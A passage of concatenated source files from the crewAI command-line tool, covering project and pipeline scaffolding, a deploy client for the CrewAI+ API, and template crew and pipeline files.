bold=True, ) if not folder_path.exists(): folder_path.mkdir(parents=True) (folder_path / "tests").mkdir(exist_ok=True) if not parent_folder: (folder_path / "src" / folder_name).mkdir(parents=True) (folder_path / "src" / folder_name / "tools").mkdir(parents=True) (folder_path / "src" / folder_name / "config").mkdir(parents=True) with open(folder_path / ".env", "w") as file: file.write("OPENAI_API_KEY=YOUR_API_KEY") else: click.secho( f"\tFolder {folder_name} already exists. 
Please choose a different name.", fg="red", ) return package_dir = Path(__file__).parent templates_dir = package_dir / "templates" / "crew" # List of template files to copy root_template_files = ( [".gitignore", "pyproject.toml", "README.md"] if not parent_folder else [] ) tools_template_files = ["tools/custom_tool.py", "tools/__init__.py"] config_template_files = ["config/agents.yaml", "config/tasks.yaml"] src_template_files = ( ["__init__.py", "main.py", "crew.py"] if not parent_folder else ["crew.py"] ) for file_name in root_template_files: src_file = templates_dir / file_name dst_file = folder_path / file_name copy_template(src_file, dst_file, name, class_name, folder_name) src_folder = folder_path / "src" / folder_name if not parent_folder else folder_path for file_name in src_template_files: src_file = templates_dir / file_name dst_file = src_folder / file_name copy_template(src_file, dst_file, name, class_name, folder_name) if not parent_folder: for file_name in tools_template_files + config_template_files: src_file = templates_dir / file_name dst_file = src_folder / file_name copy_template(src_file, dst_file, name, class_name, folder_name) click.secho(f"Crew {name} created successfully!", fg="green", bold=True) File: src/crewai/cli/create_pipeline.py import shutil from pathlib import Path import click def create_pipeline(name, router=False): """Create a new pipeline project.""" folder_name = name.replace(" ", "_").replace("-", "_").lower() class_name = name.replace("_", " ").replace("-", " ").title().replace(" ", "") click.secho(f"Creating pipeline {folder_name}...", fg="green", bold=True) project_root = Path(folder_name) if project_root.exists(): click.secho(f"Error: Folder {folder_name} already exists.", fg="red") return # Create directory structure (project_root / "src" / folder_name).mkdir(parents=True) (project_root / "src" / folder_name / "pipelines").mkdir(parents=True) (project_root / "src" / folder_name / "crews").mkdir(parents=True) (project_root / "src" / folder_name / "tools").mkdir(parents=True) (project_root / "tests").mkdir(exist_ok=True) # Create .env file with open(project_root / ".env", "w") as file: file.write("OPENAI_API_KEY=YOUR_API_KEY") package_dir = Path(__file__).parent template_folder = "pipeline_router" if router else "pipeline" templates_dir = package_dir / "templates" / template_folder # List of template files to copy root_template_files = [".gitignore", "pyproject.toml", "README.md"] src_template_files = ["__init__.py", "main.py"] tools_template_files = ["tools/__init__.py", "tools/custom_tool.py"] if router: crew_folders = [ "classifier_crew", "normal_crew", "urgent_crew", ] pipelines_folders = [ "pipelines/__init__.py", "pipelines/pipeline_classifier.py", "pipelines/pipeline_normal.py", "pipelines/pipeline_urgent.py", ] else: crew_folders = [ "research_crew", "write_linkedin_crew", "write_x_crew", ] pipelines_folders = ["pipelines/__init__.py", "pipelines/pipeline.py"] def process_file(src_file, dst_file): with open(src_file, "r") as file: content = file.read() content = content.replace("{{name}}", name) content = content.replace("{{crew_name}}", class_name) content = content.replace("{{folder_name}}", folder_name) content = content.replace("{{pipeline_name}}", class_name) with open(dst_file, "w") as file: file.write(content) # Copy and process root template files for file_name in root_template_files: src_file = templates_dir / file_name dst_file = project_root / file_name process_file(src_file, dst_file) # Copy and process src template files for 
file_name in src_template_files: src_file = templates_dir / file_name dst_file = project_root / "src" / folder_name / file_name process_file(src_file, dst_file) # Copy tools files for file_name in tools_template_files: src_file = templates_dir / file_name dst_file = project_root / "src" / folder_name / file_name shutil.copy(src_file, dst_file) # Copy pipelines folders for file_name in pipelines_folders: src_file = templates_dir / file_name dst_file = project_root / "src" / folder_name / file_name process_file(src_file, dst_file) # Copy crew folders for crew_folder in crew_folders: src_crew_folder = templates_dir / "crews" / crew_folder dst_crew_folder = project_root / "src" / folder_name / "crews" / crew_folder if src_crew_folder.exists(): shutil.copytree(src_crew_folder, dst_crew_folder) else: click.secho( f"Warning: Crew folder {crew_folder} not found in template.", fg="yellow", ) click.secho(f"Pipeline {name} created successfully!", fg="green", bold=True) File: src/crewai/cli/deploy/__init__.py File: src/crewai/cli/deploy/api.py from os import getenv import requests from crewai.cli.deploy.utils import get_crewai_version class CrewAPI: """ CrewAPI class to interact with the crewAI+ API. """ def __init__(self, api_key: str) -> None: self.api_key = api_key self.headers = { "Authorization": f"Bearer {api_key}", "Content-Type": "application/json", "User-Agent": f"CrewAI-CLI/{get_crewai_version()}", } self.base_url = getenv( "CREWAI_BASE_URL", "https://crewai.com/crewai_plus/api/v1/crews" ) def _make_request(self, method: str, endpoint: str, **kwargs) -> requests.Response: url = f"{self.base_url}/{endpoint}" return requests.request(method, url, headers=self.headers, **kwargs) # Deploy def deploy_by_name(self, project_name: str) -> requests.Response: return self._make_request("POST", f"by-name/{project_name}/deploy") def deploy_by_uuid(self, uuid: str) -> requests.Response: return self._make_request("POST", f"{uuid}/deploy") # Status def status_by_name(self, project_name: str) -> requests.Response: return self._make_request("GET", f"by-name/{project_name}/status") def status_by_uuid(self, uuid: str) -> requests.Response: return self._make_request("GET", f"{uuid}/status") # Logs def logs_by_name( self, project_name: str, log_type: str = "deployment" ) -> requests.Response: return self._make_request("GET", f"by-name/{project_name}/logs/{log_type}") def logs_by_uuid( self, uuid: str, log_type: str = "deployment" ) -> requests.Response: return self._make_request("GET", f"{uuid}/logs/{log_type}") # Delete def delete_by_name(self, project_name: str) -> requests.Response: return self._make_request("DELETE", f"by-name/{project_name}") def delete_by_uuid(self, uuid: str) -> requests.Response: return self._make_request("DELETE", f"{uuid}") # List def list_crews(self) -> requests.Response: return self._make_request("GET", "") # Create def create_crew(self, payload) -> requests.Response: return self._make_request("POST", "", json=payload) File: src/crewai/cli/deploy/utils.py import sys import re import subprocess from rich.console import Console from ..authentication.utils import TokenManager console = Console() if sys.version_info >= (3, 11): import tomllib # Drop the simple_toml_parser when we move to python3.11 def simple_toml_parser(content): result = {} current_section = result for line in content.split('\n'): line = line.strip() if line.startswith('[') and line.endswith(']'): # New section section = line[1:-1].split('.') current_section = result for key in section: current_section = 
current_section.setdefault(key, {}) elif '=' in line: key, value = line.split('=', 1) key = key.strip() value = value.strip().strip('"') current_section[key] = value return result def parse_toml(content): if sys.version_info >= (3, 11): return tomllib.loads(content) else: return simple_toml_parser(content) def get_git_remote_url() -> str | None: """Get the Git repository's remote URL.""" try: # Run the git remote -v command result = subprocess.run( ["git", "remote", "-v"], capture_output=True, text=True, check=True ) # Get the output output = result.stdout # Parse the output to find the origin URL matches = re.findall(r"origin\s+(.*?)\s+\(fetch\)", output) if matches: return matches[0] # Return the first match (origin URL) else: console.print("No origin remote found.", style="bold red") except subprocess.CalledProcessError as e: console.print(f"Error running trying to fetch the Git Repository: {e}", style="bold red") except FileNotFoundError: console.print("Git command not found. Make sure Git is installed and in your PATH.", style="bold red") return None def get_project_name(pyproject_path: str = "pyproject.toml") -> str | None: """Get the project name from the pyproject.toml file.""" try: # Read the pyproject.toml file with open(pyproject_path, "r") as f: pyproject_content = parse_toml(f.read()) # Extract the project name project_name = pyproject_content["tool"]["poetry"]["name"] if "crewai" not in pyproject_content["tool"]["poetry"]["dependencies"]: raise Exception("crewai is not in the dependencies.") return project_name except FileNotFoundError: print(f"Error: {pyproject_path} not found.") except KeyError: print(f"Error: {pyproject_path} is not a valid pyproject.toml file.") except tomllib.TOMLDecodeError if sys.version_info >= (3, 11) else Exception as e: # type: ignore print( f"Error: {pyproject_path} is not a valid TOML file." 
if sys.version_info >= (3, 11) else f"Error reading the pyproject.toml file: {e}" ) except Exception as e: print(f"Error reading the pyproject.toml file: {e}") return None def get_crewai_version(poetry_lock_path: str = "poetry.lock") -> str: """Get the version number of crewai from the poetry.lock file.""" try: with open(poetry_lock_path, "r") as f: lock_content = f.read() match = re.search( r'\[\[package\]\]\s*name\s*=\s*"crewai"\s*version\s*=\s*"([^"]+)"', lock_content, re.DOTALL, ) if match: return match.group(1) else: print("crewai package not found in poetry.lock") return "no-version-found" except FileNotFoundError: print(f"Error: {poetry_lock_path} not found.") except Exception as e: print(f"Error reading the poetry.lock file: {e}") return "no-version-found" def fetch_and_json_env_file(env_file_path: str = ".env") -> dict: """Fetch the environment variables from a .env file and return them as a dictionary.""" try: # Read the .env file with open(env_file_path, "r") as f: env_content = f.read() # Parse the .env file content to a dictionary env_dict = {} for line in env_content.splitlines(): if line.strip() and not line.strip().startswith("#"): key, value = line.split("=", 1) env_dict[key.strip()] = value.strip() return env_dict except FileNotFoundError: print(f"Error: {env_file_path} not found.") except Exception as e: print(f"Error reading the .env file: {e}") return {} def get_auth_token() -> str: """Get the authentication token.""" access_token = TokenManager().get_token() if not access_token: raise Exception() return access_token File: src/crewai/cli/deploy/main.py from typing import Any, Dict, List, Optional from rich.console import Console from crewai.telemetry import Telemetry from .api import CrewAPI from .utils import ( fetch_and_json_env_file, get_auth_token, get_git_remote_url, get_project_name, ) console = Console() class DeployCommand: """ A class to handle deployment-related operations for CrewAI projects. """ def __init__(self): """ Initialize the DeployCommand with project name and API client. """ try: self._telemetry = Telemetry() self._telemetry.set_tracer() access_token = get_auth_token() except Exception: self._deploy_signup_error_span = self._telemetry.deploy_signup_error_span() console.print( "Please sign up/login to CrewAI+ before using the CLI.", style="bold red", ) console.print("Run 'crewai signup' to sign up/login.", style="bold green") raise SystemExit self.project_name = get_project_name() if self.project_name is None: console.print( "No project name found. Please ensure your project has a valid pyproject.toml file.", style="bold red", ) raise SystemExit self.client = CrewAPI(api_key=access_token) def _handle_error(self, json_response: Dict[str, Any]) -> None: """ Handle and display error messages from API responses. Args: json_response (Dict[str, Any]): The JSON response containing error information. """ error = json_response.get("error", "Unknown error") message = json_response.get("message", "No message provided") console.print(f"Error: {error}", style="bold red") console.print(f"Message: {message}", style="bold red") def _standard_no_param_error_message(self) -> None: """ Display a standard error message when no UUID or project name is available. """ console.print( "No UUID provided, project pyproject.toml not found or with error.", style="bold red", ) def _display_deployment_info(self, json_response: Dict[str, Any]) -> None: """ Display deployment information. Args: json_response (Dict[str, Any]): The deployment information to display. 
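
        Illustrative shape (only the "uuid" key is relied on below; the remaining
        fields are whatever the CrewAI+ API happens to return):
            {"uuid": "<crew uuid>", "status": "<deployment status>"}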
""" console.print("Deploying the crew...\n", style="bold blue") for key, value in json_response.items(): console.print(f"{key.title()}: [green]{value}[/green]") console.print("\nTo check the status of the deployment, run:") console.print("crewai deploy status") console.print(" or") console.print(f"crewai deploy status --uuid \"{json_response['uuid']}\"") def _display_logs(self, log_messages: List[Dict[str, Any]]) -> None: """ Display log messages. Args: log_messages (List[Dict[str, Any]]): The log messages to display. """ for log_message in log_messages: console.print( f"{log_message['timestamp']} - {log_message['level']}: {log_message['message']}" ) def deploy(self, uuid: Optional[str] = None) -> None: """ Deploy a crew using either UUID or project name. Args: uuid (Optional[str]): The UUID of the crew to deploy. """ self._start_deployment_span = self._telemetry.start_deployment_span(uuid) console.print("Starting deployment...", style="bold blue") if uuid: response = self.client.deploy_by_uuid(uuid) elif self.project_name: response = self.client.deploy_by_name(self.project_name) else: self._standard_no_param_error_message() return json_response = response.json() if response.status_code == 200: self._display_deployment_info(json_response) else: self._handle_error(json_response) def create_crew(self, confirm: bool) -> None: """ Create a new crew deployment. """ self._create_crew_deployment_span = ( self._telemetry.create_crew_deployment_span() ) console.print("Creating deployment...", style="bold blue") env_vars = fetch_and_json_env_file() remote_repo_url = get_git_remote_url() if remote_repo_url is None: console.print("No remote repository URL found.", style="bold red") console.print( "Please ensure your project has a valid remote repository.", style="yellow", ) return self._confirm_input(env_vars, remote_repo_url, confirm) payload = self._create_payload(env_vars, remote_repo_url) response = self.client.create_crew(payload) if response.status_code == 201: self._display_creation_success(response.json()) else: self._handle_error(response.json()) def _confirm_input( self, env_vars: Dict[str, str], remote_repo_url: str, confirm: bool ) -> None: """ Confirm input parameters with the user. Args: env_vars (Dict[str, str]): Environment variables. remote_repo_url (str): Remote repository URL. confirm (bool): Whether to confirm input. """ if not confirm: input(f"Press Enter to continue with the following Env vars: {env_vars}") input( f"Press Enter to continue with the following remote repository: {remote_repo_url}\n" ) def _create_payload( self, env_vars: Dict[str, str], remote_repo_url: str, ) -> Dict[str, Any]: """ Create the payload for crew creation. Args: remote_repo_url (str): Remote repository URL. env_vars (Dict[str, str]): Environment variables. Returns: Dict[str, Any]: The payload for crew creation. """ return { "deploy": { "name": self.project_name, "repo_clone_url": remote_repo_url, "env": env_vars, } } def _display_creation_success(self, json_response: Dict[str, Any]) -> None: """ Display success message after crew creation. Args: json_response (Dict[str, Any]): The response containing crew information. 
""" console.print("Deployment created successfully!\n", style="bold green") console.print( f"Name: {self.project_name} ({json_response['uuid']})", style="bold green" ) console.print(f"Status: {json_response['status']}", style="bold green") console.print("\nTo (re)deploy the crew, run:") console.print("crewai deploy push") console.print(" or") console.print(f"crewai deploy push --uuid {json_response['uuid']}") def list_crews(self) -> None: """ List all available crews. """ console.print("Listing all Crews\n", style="bold blue") response = self.client.list_crews() json_response = response.json() if response.status_code == 200: self._display_crews(json_response) else: self._display_no_crews_message() def _display_crews(self, crews_data: List[Dict[str, Any]]) -> None: """ Display the list of crews. Args: crews_data (List[Dict[str, Any]]): List of crew data to display. """ for crew_data in crews_data: console.print( f"- {crew_data['name']} ({crew_data['uuid']}) [blue]{crew_data['status']}[/blue]" ) def _display_no_crews_message(self) -> None: """ Display a message when no crews are available. """ console.print("You don't have any Crews yet. Let's create one!", style="yellow") console.print(" crewai create crew <crew_name>", style="green") def get_crew_status(self, uuid: Optional[str] = None) -> None: """ Get the status of a crew. Args: uuid (Optional[str]): The UUID of the crew to check. """ console.print("Fetching deployment status...", style="bold blue") if uuid: response = self.client.status_by_uuid(uuid) elif self.project_name: response = self.client.status_by_name(self.project_name) else: self._standard_no_param_error_message() return json_response = response.json() if response.status_code == 200: self._display_crew_status(json_response) else: self._handle_error(json_response) def _display_crew_status(self, status_data: Dict[str, str]) -> None: """ Display the status of a crew. Args: status_data (Dict[str, str]): The status data to display. """ console.print(f"Name:\t {status_data['name']}") console.print(f"Status:\t {status_data['status']}") def get_crew_logs(self, uuid: Optional[str], log_type: str = "deployment") -> None: """ Get logs for a crew. Args: uuid (Optional[str]): The UUID of the crew to get logs for. log_type (str): The type of logs to retrieve (default: "deployment"). """ self._get_crew_logs_span = self._telemetry.get_crew_logs_span(uuid, log_type) console.print(f"Fetching {log_type} logs...", style="bold blue") if uuid: response = self.client.logs_by_uuid(uuid, log_type) elif self.project_name: response = self.client.logs_by_name(self.project_name, log_type) else: self._standard_no_param_error_message() return if response.status_code == 200: self._display_logs(response.json()) else: self._handle_error(response.json()) def remove_crew(self, uuid: Optional[str]) -> None: """ Remove a crew deployment. Args: uuid (Optional[str]): The UUID of the crew to remove. 
""" self._remove_crew_span = self._telemetry.remove_crew_span(uuid) console.print("Removing deployment...", style="bold blue") if uuid: response = self.client.delete_by_uuid(uuid) elif self.project_name: response = self.client.delete_by_name(self.project_name) else: self._standard_no_param_error_message() return if response.status_code == 204: console.print( f"Crew '{self.project_name}' removed successfully.", style="green" ) else: console.print( f"Failed to remove crew '{self.project_name}'", style="bold red" ) File: src/crewai/cli/templates/__init__.py File: src/crewai/cli/templates/pipeline/__init__.py File: src/crewai/cli/templates/pipeline/main.py #!/usr/bin/env python import asyncio from {{folder_name}}.pipelines.pipeline import {{pipeline_name}}Pipeline async def run(): """ Run the pipeline. """ inputs = [ {"topic": "AI wearables"}, ] pipeline = {{pipeline_name}}Pipeline() results = await pipeline.kickoff(inputs) # Process and print results for result in results: print(f"Raw output: {result.raw}") if result.json_dict: print(f"JSON output: {result.json_dict}") print("\n") def main(): asyncio.run(run()) if __name__ == "__main__": main() File: src/crewai/cli/templates/pipeline/crews/research_crew/research_crew.py from pydantic import BaseModel from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool class ResearchReport(BaseModel): """Research Report""" title: str body: str @CrewBase class ResearchCrew(): """Research Crew""" agents_config = 'config/agents.yaml' tasks_config = 'config/tasks.yaml' @agent def researcher(self) -> Agent: return Agent( config=self.agents_config['researcher'], verbose=True ) @agent def reporting_analyst(self) -> Agent: return Agent( config=self.agents_config['reporting_analyst'], verbose=True ) @task def research_task(self) -> Task: return Task( config=self.tasks_config['research_task'], ) @task def reporting_task(self) -> Task: return Task( config=self.tasks_config['reporting_task'], output_pydantic=ResearchReport ) @crew def crew(self) -> Crew: """Creates the Research Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline/crews/write_linkedin_crew/write_linkedin_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from {{folder_name}}.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class WriteLinkedInCrew(): """Research Crew""" agents_config = 'config/agents.yaml' tasks_config = 'config/tasks.yaml' @agent def researcher(self) -> Agent: return Agent( config=self.agents_config['researcher'], verbose=True ) @agent def reporting_analyst(self) -> Agent: return Agent( config=self.agents_config['reporting_analyst'], verbose=True ) @task def research_task(self) -> Task: return Task( config=self.tasks_config['research_task'], ) @task def reporting_task(self) -> Task: return Task( config=self.tasks_config['reporting_task'], output_file='report.md' ) @crew def crew(self) -> 
Crew: """Creates the {{crew_name}} crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline/crews/write_x_crew/write_x_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class WriteXCrew: """Research Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def x_writer_agent(self) -> Agent: return Agent(config=self.agents_config["x_writer_agent"], verbose=True) @task def write_x_task(self) -> Task: return Task( config=self.tasks_config["write_x_task"], ) @crew def crew(self) -> Crew: """Creates the Write X Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline/tools/__init__.py File: src/crewai/cli/templates/pipeline/tools/custom_tool.py from crewai_tools import BaseTool class MyCustomTool(BaseTool): name: str = "Name of my tool" description: str = ( "Clear description for what this tool is useful for, you agent will need this information to use it." ) def _run(self, argument: str) -> str: # Implementation goes here return "this is an example of a tool output, ignore it and move along." File: src/crewai/cli/templates/pipeline/pipelines/__init__.py File: src/crewai/cli/templates/pipeline/pipelines/pipeline.py """ This pipeline file includes two different examples to demonstrate the flexibility of crewAI pipelines. Example 1: Two-Stage Pipeline ----------------------------- This pipeline consists of two crews: 1. ResearchCrew: Performs research on a given topic. 2. WriteXCrew: Generates an X (Twitter) post based on the research findings. Key features: - The ResearchCrew's final task uses output_json to store all research findings in a JSON object. - This JSON object is then passed to the WriteXCrew, where tasks can access the research findings. Example 2: Two-Stage Pipeline with Parallel Execution ------------------------------------------------------- This pipeline consists of three crews: 1. ResearchCrew: Performs research on a given topic. 2. WriteXCrew and WriteLinkedInCrew: Run in parallel, using the research findings to generate posts for X and LinkedIn, respectively. Key features: - Demonstrates the ability to run multiple crews in parallel. - Shows how to structure a pipeline with both sequential and parallel stages. Usage: - To switch between examples, comment/uncomment the respective code blocks below. - Ensure that you have implemented all necessary crew classes (ResearchCrew, WriteXCrew, WriteLinkedInCrew) before running. 
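
Illustrative way to run Example 1 (a sketch only; the generated main.py is the
intended entry point and does the same thing):

    import asyncio

    pipeline = {{pipeline_name}}Pipeline()
    results = asyncio.run(pipeline.kickoff([{"topic": "AI wearables"}]))
    for result in results:
        print(result.raw)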
""" # Common imports for both examples from crewai import Pipeline # Uncomment the crews you need for your chosen example from ..crews.research_crew.research_crew import ResearchCrew from ..crews.write_x_crew.write_x_crew import WriteXCrew # from .crews.write_linkedin_crew.write_linkedin_crew import WriteLinkedInCrew # Uncomment for Example 2 # EXAMPLE 1: Two-Stage Pipeline # ----------------------------- # Uncomment the following code block to use Example 1 class {{pipeline_name}}Pipeline: def __init__(self): # Initialize crews self.research_crew = ResearchCrew().crew() self.write_x_crew = WriteXCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.research_crew, self.write_x_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results # EXAMPLE 2: Two-Stage Pipeline with Parallel Execution # ------------------------------------------------------- # Uncomment the following code block to use Example 2 # @PipelineBase # class {{pipeline_name}}Pipeline: # def __init__(self): # # Initialize crews # self.research_crew = ResearchCrew().crew() # self.write_x_crew = WriteXCrew().crew() # self.write_linkedin_crew = WriteLinkedInCrew().crew() # @pipeline # def create_pipeline(self): # return Pipeline( # stages=[ # self.research_crew, # [self.write_x_crew, self.write_linkedin_crew] # Parallel execution # ] # ) # async def run(self, inputs): # pipeline = self.create_pipeline() # results = await pipeline.kickoff(inputs) # return results File: src/crewai/cli/templates/pipeline_router/__init__.py File: src/crewai/cli/templates/pipeline_router/main.py #!/usr/bin/env python import asyncio from crewai.routers.router import Route from crewai.routers.router import Router from {{folder_name}}.pipelines.pipeline_classifier import EmailClassifierPipeline from {{folder_name}}.pipelines.pipeline_normal import NormalPipeline from {{folder_name}}.pipelines.pipeline_urgent import UrgentPipeline async def run(): """ Run the pipeline. """ inputs = [ { "email": """ Subject: URGENT: Marketing Campaign Launch - Immediate Action Required Dear Team, I'm reaching out regarding our upcoming marketing campaign that requires your immediate attention and swift action. We're facing a critical deadline, and our success hinges on our ability to mobilize quickly. Key points: Campaign launch: 48 hours from now Target audience: 250,000 potential customers Expected ROI: 35% increase in Q3 sales What we need from you NOW: Final approval on creative assets (due in 3 hours) Confirmation of media placements (due by end of day) Last-minute budget allocation for paid social media push Our competitors are poised to launch similar campaigns, and we must act fast to maintain our market advantage. Delays could result in significant lost opportunities and potential revenue. Please prioritize this campaign above all other tasks. I'll be available for the next 24 hours to address any concerns or roadblocks. Let's make this happen! [Your Name] Marketing Director P.S. I'll be scheduling an emergency team meeting in 1 hour to discuss our action plan. Attendance is mandatory. 
""" } ] pipeline_classifier = EmailClassifierPipeline().create_pipeline() pipeline_urgent = UrgentPipeline().create_pipeline() pipeline_normal = NormalPipeline().create_pipeline() router = Router( routes={ "high_urgency": Route( condition=lambda x: x.get("urgency_score", 0) > 7, pipeline=pipeline_urgent ), "low_urgency": Route( condition=lambda x: x.get("urgency_score", 0) <= 7, pipeline=pipeline_normal ) }, default=pipeline_normal ) pipeline = pipeline_classifier >> router results = await pipeline.kickoff(inputs) # Process and print results for result in results: print(f"Raw output: {result.raw}") if result.json_dict: print(f"JSON output: {result.json_dict}") print("\n") def main(): asyncio.run(run()) if __name__ == "__main__": main() File: src/crewai/cli/templates/pipeline_router/crews/urgent_crew/urgent_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class UrgentCrew: """Urgent Email Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def urgent_handler(self) -> Agent: return Agent(config=self.agents_config["urgent_handler"], verbose=True) @task def urgent_task(self) -> Task: return Task( config=self.tasks_config["urgent_task"], ) @crew def crew(self) -> Crew: """Creates the Urgent Email Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline_router/crews/classifier_crew/classifier_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task from pydantic import BaseModel # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool class UrgencyScore(BaseModel): urgency_score: int @CrewBase class ClassifierCrew: """Email Classifier Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def classifier(self) -> Agent: return Agent(config=self.agents_config["classifier"], verbose=True) @task def urgent_task(self) -> Task: return Task( config=self.tasks_config["classify_email"], output_pydantic=UrgencyScore, ) @crew def crew(self) -> Crew: """Creates the Email Classifier Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline_router/crews/normal_crew/normal_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class NormalCrew: """Normal Email Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def normal_handler(self) -> Agent: return Agent(config=self.agents_config["normal_handler"], verbose=True) @task def 
urgent_task(self) -> Task: return Task( config=self.tasks_config["normal_task"], ) @crew def crew(self) -> Crew: """Creates the Normal Email Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline_router/tools/__init__.py File: src/crewai/cli/templates/pipeline_router/tools/custom_tool.py from crewai_tools import BaseTool class MyCustomTool(BaseTool): name: str = "Name of my tool" description: str = ( "Clear description for what this tool is useful for, you agent will need this information to use it." ) def _run(self, argument: str) -> str: # Implementation goes here return "this is an example of a tool output, ignore it and move along." File: src/crewai/cli/templates/pipeline_router/pipelines/pipeline_classifier.py from crewai import Pipeline from crewai.project import PipelineBase from ..crews.classifier_crew.classifier_crew import ClassifierCrew @PipelineBase class EmailClassifierPipeline: def __init__(self): # Initialize crews self.classifier_crew = ClassifierCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.classifier_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results File: src/crewai/cli/templates/pipeline_router/pipelines/pipeline_urgent.py from crewai import Pipeline from crewai.project import PipelineBase from ..crews.urgent_crew.urgent_crew import UrgentCrew @PipelineBase class UrgentPipeline: def __init__(self): # Initialize crews self.urgent_crew = UrgentCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.urgent_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results File: src/crewai/cli/templates/pipeline_router/pipelines/__init__.py File: src/crewai/cli/templates/pipeline_router/pipelines/pipeline_normal.py from crewai import Pipeline from crewai.project import PipelineBase from ..crews.normal_crew.normal_crew import NormalCrew @PipelineBase class NormalPipeline: def __init__(self): # Initialize crews self.normal_crew = NormalCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.normal_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results File: src/crewai/cli/templates/crew/__init__.py File: src/crewai/cli/templates/crew/crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from {{folder_name}}.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class {{crew_name}}Crew(): """{{crew_name}} crew""" agents_config = 'config/agents.yaml' tasks_config = 'config/tasks.yaml' @agent def researcher(self) -> Agent: return Agent( config=self.agents_config['researcher'], # tools=[MyCustomTool()], # Example of custom tool, loaded on the beginning of file verbose=True ) @agent def reporting_analyst(self) -> Agent: return Agent( config=self.agents_config['reporting_analyst'], verbose=True ) @task def research_task(self) -> Task: return Task( config=self.tasks_config['research_task'], ) @task def reporting_task(self) -> Task: return Task( config=self.tasks_config['reporting_task'], 
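            # output_file additionally writes this task's final output to the given
            # path (report.md here); the result is still returned to the crew as usual.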
output_file='report.md' ) @crew def crew(self) -> Crew: """Creates the {{crew_name}} crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, # process=Process.hierarchical, # In case you wanna use that instead https://docs.crewai.com/how-to/Hierarchical/ ) File: src/crewai/cli/templates/crew/main.py #!/usr/bin/env python import sys from {{folder_name}}.crew import {{crew_name}}Crew # This main file is intended to be a way for your to run your # crew locally, so refrain from adding necessary logic into this file. # Replace with inputs you want to test with, it will automatically # interpolate any tasks and agents information def run(): """ Run the crew. """ inputs = { 'topic': 'AI LLMs' } {{crew_name}}Crew().crew().kickoff(inputs=inputs) def train(): """ Train the crew for a given number of iterations. """ inputs = { "topic": "AI LLMs" } try: {{crew_name}}Crew().crew().train(n_iterations=int(sys.argv[1]), filename=sys.argv[2], inputs=inputs) except Exception as e: raise Exception(f"An error occurred while training the crew: {e}") def replay(): """ Replay the crew execution from a specific task. """ try: {{crew_name}}Crew().crew().replay(task_id=sys.argv[1]) except Exception as e: raise Exception(f"An error occurred while replaying the crew: {e}") def test(): """ Test the crew execution and returns the results. """ inputs = { "topic": "AI LLMs" } try: {{crew_name}}Crew().crew().test(n_iterations=int(sys.argv[1]), openai_model_name=sys.argv[2], inputs=inputs) except Exception as e: raise Exception(f"An error occurred while replaying the crew: {e}") File: src/crewai/cli/templates/crew/tools/__init__.py File: src/crewai/cli/templates/crew/tools/custom_tool.py from crewai_tools import BaseTool class MyCustomTool(BaseTool): name: str = "Name of my tool" description: str = ( "Clear description for what this tool is useful for, you agent will need this information to use it." ) def _run(self, argument: str) -> str: # Implementation goes here return "this is an example of a tool output, ignore it and 